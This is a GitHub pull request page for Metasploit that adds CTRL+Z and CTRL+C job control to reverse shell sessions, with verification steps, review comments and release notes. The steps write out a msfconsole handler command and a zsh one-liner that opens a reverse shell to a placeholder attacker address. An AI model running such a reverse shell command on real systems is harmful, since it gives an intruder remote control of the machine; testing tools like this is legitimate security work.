Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[GSoC] Implementation of CTRL+Z in reverse shell session #10450

Merged
merged 4 commits into from
Oct 22, 2018
Merged

[GSoC] Implementation of CTRL+Z in reverse shell session #10450

merged 4 commits into from
Oct 22, 2018

Conversation

WangYihang
Copy link
Contributor

Description

Implementation of CTRL+Z to send a SIGINT signal to the reverse shell session

Verification of CTRL+Z

Attacker side

  • ./msfconsole -qx 'use multi/handler; set payload cmd/unix/reverse_zsh; set LHOST 127.0.0.1; set LPORT 4444; exploit'

Victim side

  • zsh -c 'zmodload zsh/net/tcp && ztcp [ATTACKER_IP] [ATTACKER_PORT] && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

Attacker side

  • [IMPORTANT] type shell, press enter (enter interactive shell mode) (output would be like this:)
[*] Trying to find binary(python) on target machine  
"/usr/bin/python"                                    
[*] Found python at /usr/bin/python                  
[*] Using `python` to pop up an interactive shell    
$
  • run some commands which takes too long time so that we need to press CTRL+C to end them
eg: sleep 100
  • once the command sleep 100 is running, press CTRL+Z, then you will see:
Background session 1? [y/N]
  • Press Y, you will background the whole reverse shell session
$ ^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         basic cmd/unix               127.0.0.1:4444 -> 127.0.0.1:54028 (127.0.0.1)
  • Press N, you will see the foreground process on the victim machine is
$ sleep 200
sleep 200
^Z
Background session 1? [y/N]  N
[*] Backgrounding foreground process in the shell session
^Z[1] + Stopped                    sleep 200

Environment

  • Ubuntu Desktop 18.04 (Both Attacker and Victim)

@WangYihang WangYihang changed the title [GSoC] Implementation of CTRL+Z meta command [GSoC] Implementation of CTRL+Z in reverse shell session Aug 12, 2018
wvu
wvu reviewed Aug 20, 2018
View reviewed changes
123 Outdated
@@ -0,0 +1,45 @@
root:x:0:0:root:/root:/usr/bin/zsh
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't think you meant to commit this file?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

at least it wasn't shadow...

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

oh, it's my fault....I accidentally submitted the test file, I will completely remove this file from the warehouse later today.

@WangYihang
Copy link
Contributor Author

WangYihang commented Aug 22, 2018
edited
Loading

@wvu-r7 @asoto-r7 I have already deleted the useless file, thank you guys so much for your code review~

@asoto-r7
Copy link
Contributor

Hey @WangYihang , I apologize for taking so long to land this. Your changes worked great in Linux, but the characters sent didn't work for a Windows environment. Instead, it caused the next command to fail. So I wrapped both the CTRL-Z and CTRL-C commands in a quick check to avoid windows shells.

@asoto-r7 asoto-r7 merged commit 03d5754 into rapid7:master Oct 22, 2018
asoto-r7 added a commit that referenced this pull request Oct 22, 2018
@asoto-r7
Land #10450, Implementation of CTRL+Z in reverse shell session
f742d3b 
Additionally, a check was added to disable this new functionality on
Windows command shell payloads.
@asoto-r7
Copy link
Contributor

asoto-r7 commented Oct 22, 2018
edited by gdavidson-r7
Loading

Release Notes

This adds support to Linux command shell payloads to send CTRL+C and CTRL+Z to the foreground process, allowing for job control of processes that would have otherwise required launching a new payload.

msjenkins-r7 pushed a commit that referenced this pull request Oct 22, 2018
@asoto-r7 @msjenkins-r7
Land #10450, Implementation of CTRL+Z in reverse shell session
2a0deef 
Additionally, a check was added to disable this new functionality on
Windows command shell payloads.
@WangYihang
Copy link
Contributor Author

That's great! Thank all the tremendous help of all you guys so much~

@WangYihang WangYihang deleted the impl-of-ctrl-z branch October 22, 2018 23:45
@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Nov 4, 2018
@wvu wvu mentioned this pull request Apr 25, 2019
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

@h00die h00die h00die left review comments

Assignees

@asoto-r7 asoto-r7

Labels
feature payload rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
6 participants
@WangYihang @asoto-r7 @h00die @wvu @busterb @gdavidson-r7